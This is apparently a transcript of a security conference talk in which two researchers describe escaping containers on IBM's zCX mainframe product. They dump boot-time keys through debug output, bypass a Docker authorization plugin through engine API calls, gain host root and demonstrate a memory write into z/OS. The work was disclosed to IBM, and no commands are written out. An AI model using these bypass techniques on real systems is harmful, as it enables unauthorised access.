 Hi, I'm Ian. I do container things. Hi, I'm Chad. I do mainframe things. And we're here to tell you a story today about some things we did together. We both live in Minneapolis, Minnesota, which is a cold, dark place where it's winter six months out of the year. Minnesotan hackers spend their long winters stuck inside doing deep dives, studying ancient arcana, and getting good at deep magic, which lends itself well to weird specializations. And that's how we ended up here. It all began in spring 2019. Like many good things, it began with a shitpost. A person involved in Dumb-Offs said Kubernetes is the next mainframe. So, of course, I tagged Chad in it and said, what do you think? I'm not qualified to speak on mainframes. I'm about as qualified to speak on mainframes as I am on beekeeping. I think I've gotten a little better at it since. But anyway, a few days later. A few days after that shitpost, we met at a local con for the first time in person and talked about our niche specializations. The similarities and differences between them. Although our worlds don't usually overlap, the cultures are different, the timeline is different. I mean, mainframes have been around since the 50s, and Kubernetes have been around for, like, what, six or seven days? Our approaches had some similarities, and we both knew we had some knowledge in common. In the mainframe world, it's not uncommon to patch the systems maybe once, twice a year. And in the Dumb-Offs world, people do, like, multiple deploys a day. Culturally, it's really different. Dumb-Offs people are really open to new things, open source software, really excited about doing things quickly, and doing new stuff. And mainframes, maybe not so much. No one would ever accuse the mainframe community of being excited about change. Fair enough. Both of us had experience pulling things off that other people said were completely impossible in our respective fields. We figured how to navigate in uncharted territory. We took apart technology without dedicated tooling, and with little or no prior art. We did have some things in common, though. We had shared knowledge of Linux hacking, which ended up becoming helpful for this project later. Because containers are made out of Linux features, and mainframes use Unix file systems, too. We joked about whether or not we really could prove that guy wrong, about Kubernetes being the next mainframe. But I didn't really think we would ever get to do our thing together, because, honestly, who puts containers on a mainframe? Well, joke was on me, because just a few months later, in fall 2019, IBM announced ZOS container extensions, which we will be referring to from here on out as ZCX. So we made it into a winter project. Joining forces and combining our very specific particular sets of skills, we were able to become the first people on the planet to escape a container on a mainframe. And that was just getting started. This talk is about how we did that. To talk about friendship, collaboration, cross-disciplinary skill sharing, and figuring out how to escape containers on the moon. But first, a couple of things. It would violate the laws of physics and math to fit all of the technical background that Ian and myself have about our two niche disciplines into the amount of time that we have for this talk. However, we have not figured out how yet to do this, but we're making a lot of progress, and we'll make a note of it for future talks. So we're not doing that today. We encourage people that are interested in finding out more to check the resources in our reference sections, or if you're seeing this in person, come around and ask us a question. There's a lot of ways to attack this thing that we're not going to be covering today, but we reserve the right to not answer questions about those. If you're not here in person, and you're watching this virtually an hour later, we're around the interwebs too. You could probably find us on Twitter. Probably Twitter, yeah. Speaking of which, we disclosed this to IBM, and IBM sent us a formal statement about it. To our knowledge, this is unprecedented, so we figured we would share it here. Great to IBM. Yeah, I've disclosed vulnerabilities to IBM in the past, and friends of mine have also disclosed vulnerabilities to IBM specifically for System Z, and they never get talked about publicly. This is fantastic. I really appreciate this, and I hope they do this again in the future. So, yeah, that's pretty cool. Anyway, let's get to it. So, what is this thing? Containers on a mainframe? What? That's weird. First off, let's do some myth busting. Mainframes still exist. They're widely used, and the tech is more modern than you think. UNIX, or AIX, has been ported in running a mainframe since the early 90s, and now they're actual containers that run inside an address space on IBM's most prevalent mainframe OS, ZOS. Every one of you used a mainframe today, or in person, on the way here. If you ran a credit card, if you went to an ATM, if you took an airplane, you used a mainframe. IBM's product name for this is ZCX. I'll explain what that is, but first, let's do some super basic mainframe primer. The mainframe we're talking and referring to today is IBM's flagship System Z. The operating system is known as ZOS. Sometimes, excuse me, sometimes it's still called MPS by its old timers. It runs most of the mainframes on the planet, and it runs a unique architecture called Z architecture. Within this OS, the basic unit of user or process separation is known as an address space. ZCX is a custom hypervisor, which emulates Z architecture and runs in its own address space on ZOS. Atop ZCX, there is a customized bare bones Linux image running Docker containers. IBM hardened this image and created a custom Docker plugin to support a secure Docker base install, which allows the user to create and manage containers. So, Ian, what's a container? What is a container? First of all, let's talk about what it's not. A container is not the same thing as a virtual machine. Containers don't have their own kernels or standalone resources, at least most of the time. Containers share resources with each other and with their hosts. And unlike a virtual machine, if you kill a container process, you kill the entire container. Docker is the most common container engine, but it's not the only one, and they can vary pretty widely in implementation and behavior. Some of them even have hypervisors. ZCX does use Docker, though, so that's what we're going to be talking about today. This isn't the first time Docker containers have been run on mainframe computers. Docker has been running on bare metal Linux instances on mainframes for a minute, but that's just plain Linux. ZCX is different because it's the first time containers have been run on ZOS. But what is a container anyway? Well, a container isn't really a thing at all. They're basically a set of native Linux features that are put together in order to isolate a process. These features are C groups and namespaces. C groups determine what resources a process is permitted to use, like CPU and memory. Namespaces determine what a process is permitted to see, like directories and other processes. Together, C groups and namespaces make up what we call a container, which is really just an isolated process. Containers as a concept don't really exist in the Linux kernel. As far as the kernel is concerned, a container is no different than any other process running on the host. What this also means is that you can look at a container process like you could any other process on a Linux host. For this demo, we've already escaped to the ZCX host, so we're looking from there. So let's run a container with the name honk, command sleep 1312. The honk isn't really necessary here. I just wanted to honk at you. If we list our containers, we can then see that container running. We can see this or any other container on the outside by running a ps command, which will show us containers running on the host alongside other processes. This command output will give you the process ID, the user running it, the PID namespace number, and the command line argument. If we want to take a look at the inside of the container, we can do so by looking at the procns folder for the process ID of that container. We found the PID of the container we just created in the ps command output we just ran. Let's take a closer look. We take a look here. We can see the C group at the top and the other namespaces on the bottom. All processes on X are made up of these namespaces. As of kernel version 5.6, there's also a time namespace, but ZCX runs an old-ass kernel, so this demo won't show you that one. Depending on the configuration and how the container was created, some of these namespaces might be shared with the host, and some might be unique to the container. We're not going to get into that here, but I recommend checking out the resources in the reference section to learn more. And that's it. Honestly, that might be the closest thing you're ever going to be able to get to being able to actually look at a container, because that's all a container is, a process made of C groups and namespaces. Because containers do share resources with one another and their hosts, containers present a wide and varied attack surface, where if a container is compromised or misconfigured, containers can compromise each other and their hosts. I just think they're neat. They're fun to break, so let's talk about breaking some. So, how to break this thing anyway? We approached ZCX from both ends, using our respective knowledge and skill sets, and we ended up taking ZCX completely apart from both the container side down into the mainframe and the mainframe side up into the containers. But first, before we did anything else, Chad set up a lab in the cloud. It's true. It was a complicated lab, and it took a while to get it going. Let me explain. We had to build a cloud-based ZOS environment with the latest ZCX code release. We used IBM's ZPDT, that stands for Z Personal Development Tool. It's a virtualized platform that emulates Z hardware and runs atop Linux. On top of ZPDT, we loaded the newest ZOS version, fully patched it, and were able to install and run ZCX in the cloud. So it looks a little bit like this. A top of Linux, which is a hosting provider, we run a Linux instance. Running in that Linux instance is ZPDT. On top of ZPDT hypervisor is ZOS. Within ZOS, there's an address space which runs the ZCX hypervisor. On top of that, runs a Linux instance, and in that, runs Docker on Docker. And that's our research environment. Simple. Something along those lines, yeah. So, but to really be able to attack this, we needed to level up our skill sets. So we started out by cross-training each other. We set aside time to share skills and get each other up to speed and have to be dangerous. Because for me, I didn't really know how to do anything with a mainframe. I couldn't spell Docker. But you're good. And so we needed a little bit of help getting each other up to speed. So we started doing that. First thing, I took Chad's evil mainframe class. Chad's a really good teacher. It's a really good training. If you ever get the chance, I recommend it. It's upward as such cons that you may or may not have heard of like Black Hat every once in a while. So the training is multiple days long. It goes over the history of mainframes, how everything works, and there's a CTF at the end. It was really good. I had a really good time at bed. Mainframes were brand new to me. I had never touched one before. I had never really had an occasion to. I'm used to bleeding edge cloud native tech stacks. That old stuff never really comes into play for me at work. And while unit system services felt familiar enough, the older stuff was wild. I had never seen or dealt with architecture like that before. It was so foreign to me. It might as well have been made on the moon. I learned in systems. So it took me a little while longer to ramp up at first until I figured out how the whole thing worked together. Chad was very patient with this. I did get there eventually. I still call them in frames though. Don't let Ian fool you. They picked up mainframes super fast, as good as anyone I've seen. The next thing was for me to train up on containers. And Ian helped me do the Secure Kubernetes CTF. I'd done only a little bit of work on Docker before, generally with CTFs and little like. It's always seemed like a little bit of magic to me. Working with Kubernetes and Dockers in the Secure Kubernetes CTF really helped me make some sense out of it. It did bring me back to my beginning mainframe days. I mean, this is complex and a really steep learning curve of a bunch of abstract concepts. I still put my overall understanding of Kubernetes at like 5% maybe, and containers somewhere in the neighborhood of maybe 30%. But working side by side with Ian has really helped me. They've always stopped to take the time to answer my questions of very detailed answers and examples. I definitely would not have wanted to embark on this without their guidance and patience. Don't let Chad fool you either. He took right to it, because he already had a base of Linux knowledge and because containers are made out of Linux internals and container orchestration is made out of containers, he was up and running really fast. It was really fun to watch, and it was really fun to get to come up with a curriculum to train you, because I'm not a professional trainer. That wasn't really something I had done before. So it was cool to come up with one for you to teach you everything, early summer things. Anyway, so after we had trained each other up, we took our new skills and our existing knowledge and started taking a look at the product. Working together, but separately, we looked at our respective spaces. I looked at the containers. And I looked at the mainframes. And we tried to figure out how to get into it. On the mainframe end, I started with the initial provisioning of ZCX. This is where the primary image files live in the Unix subsystems on the mainframe. This is where you initiate ZCX, you provision it, and thus all of the artifacts that might be interesting to us are stored here. I uploaded these files used to build the root ZCX file system to a Linux box, and then I could take them apart with the proper tools. I fired up my exotic hacking tools like strings. I quickly discerned that the core of these image had two main parts, a whole bunch of bash scripts, and a bunch of Linux disk images. I extracted and examined these bash scripts alongside the job log, which shows messages as ZCX launches. Immediately, I noticed that the scripts all had debugging outputs, but that none of the debugging outputs were showing up in the job log. What to do? Well, going back to the bash scripts, I looked, and there was this super helpful line near the top of the first bootloader script that gave away the secret. Uncomment this line to enable debugging output. Thanks, developers. Who said being a hacker was difficult? All you have to do is just learn how to bleed. So I patched this binary, put it back on the mainframe, and repositioned a new ZCX. Fabulous. The job log spat out all of the debug for all of the bootloader stages. There were so many messages, though, about keys and decryptions. My interest was piqued, and the hunt was on. I patched the bash script up again and started looking for the initial decryption keys. I used the tried and true hacker skills of echo privatekey.pem, and I dumped the first of several encryption keys to the job log. However, I couldn't fully reverse the file system yet, because despite being able to echo these keys in the initial bootloader processes to the job log, I couldn't actually find the keys in the file system. It's a pretty complex setup. So I could copy the keys one by one out of the job log, but this is a colossal pain in the ass. For the moment, I was stuck, and I turned it back over to Ian. So looking at the container setup, I immediately saw some things that looked promising. First of all, the initial user was in the Docker group, which is a security hole so fundamental it literally comes with a warning label on every new install on ZOS. Somebody had to have seen this label and actively ignored it. Sweet. Wow, okay. So, sweet, this looks good. Moving on. The container setup that ZCX has was Docker and Docker, which has known security holes, especially in certain configurations. There are a couple of approaches to Docker and Docker. It can mean running the Docker daemon inside a container, running inside another container, or it can mean running only the Docker CLI or the Docker SDK in a container and connecting it to the Docker daemon on the host. ZCX has a setup like the latter one. The approach to Docker and Docker that ZCX uses has a few different known drawbacks and some known security holes, because in this setup, the container running the Docker CLI can manipulate any containers running on the host. It can, for example, remove containers. It can create privileged containers that allow equivalent access to the host. And ZCX Auth plugin, which was part of their security model, tried to account for this, but it didn't quite work entirely. Wait, what? I hadn't mentioned ZCX Auth plugin yet. What's up with this? Let's get there. So, I had looked at this and realized pretty quickly that it wasn't completely wide open. My first attempts of doing the sort of like most bog standard, kind of like, okay, can I run a container as privileged in here? Can I execute a command as root? That kind of thing were blocked by this Docker authorization plugin that they were using called ZCX Auth plugin. ZCX Auth plugin did a few different things. Blocked privileged containers, blocked executing commands as root. It also blocked mounting the host path as a read write mine amount. Okay, fair enough. But I neither had to be a way to get into this because honestly, just look at that setup. And I wanted to figure out how the thing worked. So as I do, I went to the docs and as they often do, the docs point the way. Quite literally, IBM helpfully listed all the security restrictions on the product, telling us all the things that we were not allowed to do because they adversely affected security features or may compromise the product. Well then, thanks IBM. I appreciate the tips. I was clearly going to have to try all of those immediately. The language and the docs at the time claimed that it was not possible to become root or access or modify the Linux host, but I knew that it was possible because they gave enough information away about their system to tell me so. Here's why. For one thing, what ZCX Auth plugin blocked gave me very specific error messages. For another thing, the commands they were blocking through ZCX Auth plugin were very specific, which pointed to a specific set of system configurations and also the possibility maybe that they might be blocking through pattern matching projects. Really? This was like trying to prevent SQL injections by banning the string or 1 equals 1 without banning other things like, for example, and 1 equals 1 or, you know, parameterizing queries on the back end or anything else that 1 might do with SQL injections. Even if it is possible to prevent all attacks via trying to block known bad syntax, which I think most people here can probably guess that it's not because there's lots of ways to bypass that, it's also immediately clear upon looking at this that there were a lot of options they missed, many of which were security relevant. And in fact, going through the docs, it became obvious pretty quickly that maybe the folks who were developing this thing were a little newer to containers. Another page in the documentation had a section on restrictions on bind mounts, which said that you couldn't mount host resources. Okay. I already knew that the plugin tried to block that one. It also mentioned that bar run Docker socket was read only. Oh, that was the key to the front door. Let's talk about the Docker socket for a minute. The Docker socket is a known security hole if you leave it exposed to, for example, users in the Docker group. This gives that user root equivalent access to the host. And read only for the Docker socket is not a security boundary for a couple of reasons. One, you can make a whole volume read only and all of the files in a folder read only, and that doesn't actually affect sockets because sockets don't work that way. Also, the Docker socket in particular has an API layer that you can make calls to and an entire Docker engine API for commands that you can execute to it while making those calls. And in the commands that the docs had mentioned blocking, they didn't mention any of the syntax around the engine API at all. I made a curl call creating a new container that mounted the host path as a read write find map via engine syntax. And hey, the words. So I knew that making calls could work and that binds was an option they missed. Sweet. But when I tried shooting out into the host system, it didn't quite work the way that I wanted it to because they had enabled username space remapping. What this means for my purposes is that once I was out of that name space, even though it said I was root, I couldn't really do anything meaningful in that name space. And they had locked down the pseudo response real hard, which was throwing weird permissions errors that I hadn't seen before. So that was kind of odd. But okay, maybe this one wasn't going to work. But at this point, I knew I was getting somewhere. I'm going to take a second here to explain username space remapping because it's important. Linux namespaces provide isolation for running processes. They limit their access to system resources without the running process being aware of the limitations. You don't want to run your containers as a root user generally. It is not a secure thing to do. But sometimes for various system reasons, you get a container in which something has to run as root. So for those containers whose processes have to run as the root user within the container, you can remap this user via username space remapping to a less privileged user on the Docker host. The mapped user is assigned a range of UIDs, which function within the namespace as normal UIDs from 0 to 65536. But they have no privileges on the host machine itself. This was why, even though I was theoretically running as UID 0, I couldn't really get anywhere. So knowing that the API calls could work to the engine API, but that username space remapping was kind of cramp in my style, I figured I'd try something else. I tried a username space host option through the API because setting username space to host breaks username space remapping. This option was blocked by the plugin when I tried it before in a Docker run command. But via the API, it worked. And this time, when I got in, I had full root access to all the host resources. This system really needed more defensive depth. It appeared to have been built upon the assumption that no one could ever become root on the host, like they really believed their own propaganda. So nothing was really locked down on the backend by that point. Once you were in, and once you were root, you could really do whatever. And it was kind of fun, actually. I haven't really had that much fun running around an environment since early Kubernetes, which was similarly locked down. And I hadn't gotten to do that. So in a while, since Kubernetes improved, that was fun for me. Anyway, the first thing I did, once I had access to the host file system, was look inside the root folder because, you know, why not? And in the root folder, there was another folder called root keys. Well, that sounded great. Obviously, there's going to be something interesting in root keys. So I took a look in there, and I found a private key called IBM Encapsulation Private Pem. Didn't quite know what that was, but I figured probably you did. So I landed it in Chad. Figuring it might be useful. Chad then took the key, reverse engineered the cobalt or something, and then we had a system to look at. Right. So it wasn't exactly cobalt, but it was pretty complex. So it was like a Fortran, right? Exactly. It was Fortran. Thank you. Ian had found the key that I was looking for. And once I had the key, I could finish reverse engineering the root file system, and then I was able to look at this in more depth. The root file system bootloader processes are a myriad of lux encrypted file systems, init rem file systems, wrapped encryption keys, and a whole bunch of scripts putting it all together. After parsing it all and reassembling the unencrypted file systems on my Linux box, I had a moment and realized what this was. This is IBM's secure service container, or as it used to be called, Z appliance container infrastructure, ZACI. IBM's secure service container is an offering that they sell for Linux, Linux one, where it runs directly on bare metal IBM mainframes as a secure appliance. The file systems were littered with these acronyms. It dawned on me that what they had done was taken this, and this is why there was this wild maze of keys and encryption and scripts. They lifted this SSC, which normally has its initial decryption keys inside of hardware service module, and poured the whole thing to software on a disk. IBM normally builds these hardware enclaves, but it's harder to do that in the cloud. As it turns out, you can't actually lift and shift things into the sky. What we were coming to find out is that the security model in ZCX was a combination of mainframe and container security models, and a combination that worked in kind of interesting ways. Since container shares resources with each other and their hosts, securing for containers requires a holistic approach. Any given container system is only as secure as any given part of its stack, really every part of its stack. You have to have defense and depth in every layer on a container system. Containers are literally made out of layers, but that means that you, not only do you need to, but that you can do every little bit at a time. This is somewhat different security model than about on a mainframe. The mainframe security model is really granular. You can configure security on literally anything on the mainframe. However, it's also a monolith in its security model, and it can be very binary, like a light switch. Defense and depth on the mainframe can be really difficult if you have made any security configuration errors that would allow you to basically bypass all the security controls because you screwed up one or two really key important things. Mainframes are wild. They are wild. So the differing approaches to these two security models came into play with the way that ZCX got built, and these two combined in some somewhat unexpected ways. And that way they got combined led to some somewhat unexpected behavior for both of us. So we worked together, passing things back and forth. When either of us ran into the limits of our knowledge or saw something that didn't really make sense in the respective context we were used to, we would pass the problem to the other person who would recognize it from their knowledge and context, and then we would do it again. So, back to the container system. I'm in there. I have full root access, but I was having a hard time understanding some behavior that I was running into. The Docker service kept throwing these weird system D errors I hadn't seen before, and my debugging tools weren't really helping in helping me figure out why. I wasn't really sure what was up with this. Meanwhile, on the mainframe side of things, I found this directory in Etsy system D services had these weird permissions on it. 644, which any of you Linux people would know that 644 is kind of odd permissions for a directory because the execute bit isn't set. I found this because I was copying it from a Linux box to another directory and my copy command threw an error because it couldn't copy that directory. Why would you want a non-executable directory? I'd never seen this before. I showed this to Ian with a comment about how strange I thought this was. Oh, huh, okay. This partly explained the errors that I had been getting with the Docker service that I hadn't been able to figure out, sort of. The permissions bit made sense in a container context. 644 are actually pretty standard permissions for the Docker service for compliance reasons, but this particular service didn't quite act the way that I would normally expect it to. The Docker service interacted with several other system D services. One of the services it was interacting with was called ccxoffplugin.service. So I took a look at that. I wanted to know how this plugin worked and could we disable it? Docker authorization plugins aren't super commonly used, but the ones that I had seen, which were open source, generally behaved in pretty similar ways. This authorization plugin was different. It was closed source and it interacted with system D as a service in a way that I hadn't seen before. It kept making these calls back and forth and running it against a list of string magic text. What the fuck? This wasn't common behavior in container context at all. I had never seen such a thing. Ian explained this to me and it occurred to me that what was going on here might have a similar corollary in the mainframe world. Specifically, mainframe exits. Let me explain. So within ZOS, there's a concept of an exit. What an exit is used for is if you want to do some really specific customization to some part of the system. An exit is literally a program that you write, usually an assembler or C, maybe C++, that is called from an API in some kind of a system routine. So the way it works is, let's take an example, a password processing routine. So Ian's going to change their password on the mainframe to Sparkle. So they type in the password Sparkle. The mainframe then says, okay, that's fine, but I see that there's an exit defined for password compliance. So it will call the program that I wrote and in my program, the mainframe exit for password policy, I'm going to check all kinds of things. Is this word part of the dictionary list? Is it part of, is it the month? Is it the current year? Is it Ian's name? Things like that, that the system wouldn't normally check. And if it is okay, I'm going to pass back a return code that says, that's fine, Ian, can you Sparkle? Or if it's not good, I'm going to say, no good, and I'm going to make them change their password back to something else. So I explained this to Ian. I said, I think what's happening here is that the programmers who know how to write exits to modify and control system behavior have written an exit in the ZCX auth plugin and that's how they're trying to control the security of this product. Wild. Meanwhile, I was also looking at the ZCX auth plugin, but I was looking at the binary. And the first thing that I noticed was that it was huge. I mean, listen, normally on mainframes, things are built with like really tight assembly code or C code. The binaries, even for super complex mainframe systems, are small because of this reason. Take example of the nucleus on a mainframe, which is like kind of like the kernel, like the core bit that tells everybody what to do. It's maybe 50 mags on the mainframe. And the ZCX auth plugin is six mags. I started dumping it and looking at it with a hacksetter and a disassembler. And there's all kinds of calls in here to things that have nothing whatsoever to do with Docker or security. And I was like, what is going on here with this thing? So I called it back to Ian and I said, what is this? What's happening here? This is what I knew. It was a go binary. They were thick like that. They have a lot of dependencies. They make a lot of extra calls. That's normal for go. At one point, I tried to Docker pull the image for go-lining and I crashed to our entire lab for disk space. Oops. I'm just unfamiliar with these kinds of size constraints because I'm used to go spaying. And so although I recognized the go patterns in the code, that made sense to me. Some of what that code was doing looked kind of weird. I was like, it looked unfamiliar in a way that at this point I had learned to figure out probably meant it was doing something kind of weirdly mainframe specific, despite the fact that it was a go-length thing that I might otherwise be used to seeing. So at this point, I think we all knew. This was clearly going to keep happening. And we were going to need to get a deeper looking at system together. But to get into the system as deep as we wanted to, we were going to need persistence and tools. So we made a lab version of ZCX. And we ripped out all of the security features that IBM had left behind for us. We disabled the ZCX auth plugin. We disabled user namespace equals remap. We made all of the read-only mounts into read-write mounts. We stored this file system onto a mainframe dataset. We added a debugger. We got APT up and running so we could update the software and install new applications and programs. And I even, very proud of this, figured out how to make SSH run on the root file system by copying the SSHD binaries and the corresponding libraries out of the Docker overlay file systems and running them in the root file system. So we had a direct backdoor into the root file system and could commence doing a little bit deeper research. We're still doing more with that. So where do we go from here? Well, we have a to-do list. So we're still working on this project. We have a couple of obvious points to attack that we've already gathered some information about and maybe some less obvious ones that we won't be talking about here. One of my favorite things is disassembling, disassembling your reverse engineering code. So disassembling the ZCX auth plugin is something that I'm absolutely looking forward to. However, it's written in Go and it's on an architecture using tools that we're not really designed for that architecture. Let me explain. If you look at any of the open-source tooling designed for mainframe, what you'll see is the architecture not listed as Z architecture but listed as S390X architecture. They are the same thing. In open-source parlance, S390X equals Z architecture. And even though I have things like Objdom and GDB and that sort of thing, when I disassemble these binaries, I'm going to end up with Z assembler code, not X86, not ARM, but Z assembler code. So this is going to make it quite a bit more complicated to get through. But doing this, I think, is going to open up some obvious pointers to other security vulnerabilities. S390X architecture kept coming up and kept kind of throwing wrenches at things throughout this process because open-source tooling sometimes supports S390X but a lot of the time it doesn't. And honestly, for really valid reasons, open-source developers, often who are working for free, are like, I don't work for IBM. Why would I work for something that is specific to IBM architecture? They're not paying me to do this. If you want people to do this, you can hire people to do this. And therefore, a lot of tools just aren't supported. That kept coming up as I kept running into like, okay, I'm going to go with this open-source tool that I used to use it and having it be like, no, and have some sort of terrible architecture failure like seven layers down the stack. It was kind of cool for learning and also paying the ass. Anyway, the real goal here for us would be a full hypervisor escape, which we believe can be done. CCX runs in an address space within ZOS and that address space runs as authorized. Let me explain what this means. In a mainframe context, running as authorized means something specific. It's like security through the file system. So if you had a folder on Linux where anything that was in that folder automatically ran as UID0 as root and not only that, it had root access to everything else in the system. That's actually how mainframe authorized address spaces work, which is wild. And what this means is that if we can get code execution in that address space, which frankly, we believe that we can, we will be able to own the entire mainframe server, all of it, everything. We already know that there are direct memory links. IBM hopefully provided us this hideously ugly diagram in Comic Sans telling us so and also we know because of this demo. Okay, just going to show you a quick demo on what we think might be possible in the future. We've done a little research on the shared memory links between ZCX and ZOS. We know they exist. They're in some of the diagrams and the documentation talks about it. But we found one of particular instances we'd like to show you now. So this demo is basically just giving you kind of a window into what might be possible by way of just kind of a fun demonstration. So if we log into our log into our backdoor of our ZCX instance, so this is an SSH server that I booted up that's just running on the root level of the ZCX instance now, not bothering having to go back in through Docker and escape down to the root instance. We're just running an SSH daemon directly from it now to get in and out as part of our research environment. And I'm going to run some hackery commands from this ZCX instance that I'm not going to show today. And just to give you an example of what we think is possible, let's log back into the mainframe system. So I'm going to go log in with my TSO ID onto our mainframe. And once I'm into TSO, I'm going to launch ISPF, which is kind of the green screen that everybody associates with mainframe and is still probably the primary means of accessing the mainframe. And I'm going to go into SDSF, which is where all the output for all the jobs is stored, and look at one of our active jobs, which is named Moon, which is the ZCX server that we're looking at. So if I scroll down in this job log and I go all the way down to the bottom, you can see that there is definitely a connection between the commands that I just executed in ZCX and my ability to write to memory inside of ZOS, placing the goose there at the end of that job log. So the demonstration here was basically just to show you that what we have is what we have done is we've gone down through the Docker engine into the root Linux container. What's labeled here is Linux kernel, and that we know there are memory connections between that kernel through the ZCX hypervisor into ZOS. And so our next project is really to try to figure out how to take advantage of that and do memory overwrites and gain access then full access to an authorized address space within ZOS. Doing so would give us access to then all of the data, the programs and everything running on ZOS, which is ultimately the end goal. We couldn't wrap this up without discussing what we've learned. None of this or any of the future work that we will do would be possible without the sparkling partnership between Ian and myself. And I have to add a side note, but I think I've said sparkling in this talk more than I've ever said in my entire life when I wasn't ordering a drink. It's all the glitter I left everywhere. It is indeed. There's a lot of glitter. Here's what I learned. In my niche world, I'm often the expert that people come to for input. I like this. I worked hard for it. I like the recognition that comes with this. I admit, I find it hard to ask for help or admit that I don't really know where to start on a thing, especially if it's something that I could probably figure out on my own eventually, but maybe it would take me six months or a year. I don't know if this resonates with any of you, but collaborating on a thing like this means sharing the spotlight, right? Letting somebody else guide you and being humble. This is hard. This is hard for me, and maybe it's hard for some of you, but it's been a really good experience. It's been really good for me. I like to encourage all of you watching this to do this too. Be vulnerable. Ask for help. Be humble. Even when it's hard. It's not only okay, but the outcome can and likely will be better than going it alone. I've learned too. I'm more used to asking for help. I work collaboratively a lot. I'm a member of a hacker crew called Sehkank. We work together all the time and admit when we don't know things and ask for help and do that a lot. So I was more used to that. What I wasn't used to was working with people who have a skill set that overlaps a little with mine, because usually when I do collaborative work, I do it with other container people. And it's been really awesome to get to work with somebody who has knowledge that is so new to me. And it's so different from mine. I've gotten to learn so much from you, and it's been great. And to me, I felt really inspired by that. I think we both have, about what kinds of possibilities this could lead to for people, because we don't always think about this, right? We hang out with people in our bubble. Maybe they do the same kind of things we do. Maybe they're a lot like us. And if we start working more closely with people who are really different from us, either in just their skill set or just in the way that they are, the way that they grew up, the way that they live, you can learn a whole lot from doing that in a way that is really awesome. And if we all start doing that more, we can learn more from each other, and we can build and break things more amazingly, and things that wouldn't have been possible before, if we can work across like chasms in that way. So that's been really sweet. And we want to encourage you all to do that too, because what can you do together? What can you build? What can you break? There are infinite possibilities, and we really want to see what you can do with that. We want to see what we all can do with that. I don't think we do it as enough as an industry. So let's find each other. Let's make things happen. You and a small crew of committed friends can change the world. The secret is to really begin. Thank you. Thank you.